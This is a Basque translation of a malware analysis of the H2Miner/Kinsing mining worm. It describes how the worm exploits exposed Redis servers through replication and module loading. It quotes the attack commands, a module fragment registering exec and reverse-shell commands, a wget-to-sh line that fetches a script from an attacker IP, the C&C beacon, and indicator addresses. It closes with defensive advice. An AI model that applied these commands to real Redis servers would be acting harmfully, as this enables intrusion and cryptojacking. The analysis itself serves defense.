Duela egun bat, nire proiektuko zerbitzarietako bati antzeko harra batek erasotu zuen. "Zer izan zen hori?" galderari erantzun bila. Alibaba Cloud Security taldearen artikulu bikaina aurkitu dut. HabrΓ©-ri buruzko artikulu hau aurkitu ez dudanez, zuretzat bereziki itzultzea erabaki dut <3
Sarrera
Duela gutxi, Alibaba Cloud-en segurtasun taldeak H2Miner-en bat-bateko agerraldia aurkitu du. Har gaizto mota honek Redis-en baimenik eza edo pasahitz ahulak erabiltzen ditu zure sistemetarako atebide gisa, ondoren bere modulu gaizto propioa esklaboarekin sinkronizatzen du maisu-esklaboaren sinkronizazioaren bidez eta azkenik, modulu gaizto hau erasotutako makinara deskargatzen du eta maltzurren exekutatzen du. argibideak.
Iraganean, zure sistemen aurkako erasoak, batez ere, erasotzaileak Redis-en saioa hasi ondoren zure makinan idatzitako zeregin programatuak edo SSH gakoak inplikatzen zituen metodo baten bidez egiten ziren. Zorionez, metodo hau ezin da sarritan erabili baimenen kontrolaren arazoengatik edo sistemaren bertsio desberdinengatik. Hala ere, modulu gaizto bat kargatzeko metodo honek erasotzailearen komandoak zuzenean exekutatu ditzake edo shell-era sarbidea lor dezake, hori arriskutsua da zure sistemarentzat.
Interneten ostatatutako Redis zerbitzari kopuru handia dela eta (ia milioi bat), Alibaba Cloud-en segurtasun taldeak, adiskidetasunezko oroigarri gisa, gomendatzen du erabiltzaileek Redis sarean ez partekatzea eta aldian-aldian egiaztatzea beren pasahitzen sendotasuna eta arriskuan dauden ala ez. aukeraketa azkarra.
H2Miner
H2Miner Linux-en oinarritutako sistemetarako meatzaritza botnet bat da, zure sistema hainbat modutan inbaditu dezakeena, Hadoop yarn, Docker eta Redis urrutiko komandoen exekuzio (RCE) ahultasunen baimenik eza barne. Botnet batek script maltzurrak eta malware deskargatuz funtzionatzen du zure datuak meatzeko, erasoa horizontalki zabaltzeko eta komando eta kontrol (C&C) komunikazioak mantentzeko.
Redis RCE
Gai honi buruzko ezagutza Pavel Toporkov-ek partekatu zuen ZeroNights 2018-n. 4.0 bertsioaren ondoren, Redis-ek plug-in kargatzeko funtzio bat onartzen du, erabiltzaileei C-rekin konpilatutako fitxategiak Redis-en kargatzeko aukera ematen dien Redis komando zehatzak exekutatzeko. Funtzio honek, erabilgarria izan arren, ahultasun bat dauka, non, maisu-esklabo moduan, fitxategiak esklaboarekin sinkroniza daitezkeen birsinkronizazio osoa moduaren bidez. Hau erasotzaile batek erabil dezake fitxategi gaiztoak transferitzeko. Transferentzia amaitu ondoren, erasotzaileek modulua erasotutako Redis instantzian kargatzen dute eta edozein komando exekutatzen dute.
Malware zizarearen analisia
Duela gutxi, Alibaba Cloud segurtasun taldeak aurkitu du H2Miner gaiztoen meatzari taldearen tamaina bat-batean izugarri handitu dela. Azterketaren arabera, erasoak gertatzeko prozesu orokorra honako hau da:
H2Miner-ek RCE Redis erabiltzen du erabateko eraso baterako. Erasotzaileek babesik gabeko Redis zerbitzariak edo pasahitz ahulak dituzten zerbitzariak erasotzen dituzte.
Ondoren komandoa erabiltzen dute config set dbfilename red2.so fitxategiaren izena aldatzeko. Horren ostean, erasotzaileek agindua exekutatzen dute slaveof maisu-esklabuaren erreplikazio-ostalari helbidea ezartzeko.
Erasotako Redis instantziak maisu-esklabo konexioa ezartzen duenean erasotzailearen jabetzako Redis gaiztoarekin, erasotzaileak kutsatutako modulua bidaltzen du fullresync komandoa erabiliz fitxategiak sinkronizatzeko. Red2.so fitxategia erasotutako makinara deskargatuko da. Erasotzaileek ./red2.so kargatzeko modulua erabiltzen dute so fitxategi hau kargatzeko. Moduluak erasotzaile baten aginduak exekutatu ditzake edo alderantzizko konexio bat abiarazi (atzealdeko atea) erasotutako makinara sarbidea lortzeko.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Komando gaizto bat exekutatu ondoren, adibidez / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, erasotzaileak babeskopia-fitxategiaren izena berrezarri eta sistemaren modulua deskargatuko du arrastoak garbitzeko. Hala ere, red2.so fitxategia erasotutako makinan jarraituko du. Erabiltzaileei gomendatzen zaie erreparatzea fitxategi susmagarri bat bere Redis instantziaren karpetan.
Baliabideak lapurtzeko prozesu gaizto batzuk hiltzeaz gain, erasotzaileak script gaizto bat jarraitu zuen fitxategi bitar gaiztoak deskargatu eta exekutatuz. . Horrek esan nahi du ostalariaren kinsing-a duen prozesu-izena edo direktorio-izenak makina hori birusak kutsatuta dagoela adieraz dezakeela.
Alderantzizko ingeniaritza emaitzen arabera, malwareak funtzio hauek betetzen ditu batez ere:
- Fitxategiak igo eta exekutatu
- Meatzaritza
- C&C komunikazioa mantentzea eta erasotzaileen komandoak exekutatzen
Erabili masscan kanpoko eskaneatzeko zure eragina zabaltzeko. Horrez gain, C&C zerbitzariaren IP helbidea gogor kodetuta dago programan, eta erasotutako ostalaria C&C komunikazio zerbitzariarekin komunikatuko da HTTP eskaerak erabiliz, non zonbi (zerbitzari konprometitua) informazioa HTTP goiburuan identifikatzen den.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Beste eraso metodo batzuk
Harrak erabiltzen dituen helbideak eta estekak
/kinsing
β’ 142.44.191.122/t.sh
β’ 185.92.74.42/h.sh
β’ 142.44.191.122/spr.sh
β’ 142.44.191.122/spre.sh
β’ 195.3.146.118/unk.sh
ziak eta abar
β’ 45.10.88.102
β’ 91.215.169.111
β’ 139.99.50.255
β’ 46.243.253.167
β’ 195.123.220.193
Aldundiak
Lehenik eta behin, Redis ez luke Internetetik atzitu behar eta pasahitz sendo batekin babestu behar da. Garrantzitsua da bezeroek Redis direktorioan red2.so fitxategirik ez dagoela eta ostalariaren fitxategi/prozesuaren izenan "kinsing" ez dagoela egiaztatzea.
Iturria: www.habr.com